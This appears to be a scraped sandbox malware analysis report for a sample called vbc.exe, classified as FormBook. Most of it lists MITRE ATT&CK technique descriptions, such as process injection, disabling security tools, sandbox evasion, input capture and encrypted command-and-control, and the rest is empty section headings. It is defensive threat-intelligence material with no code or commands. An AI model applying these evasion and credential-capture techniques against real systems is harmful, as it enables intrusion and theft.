Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report vbc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets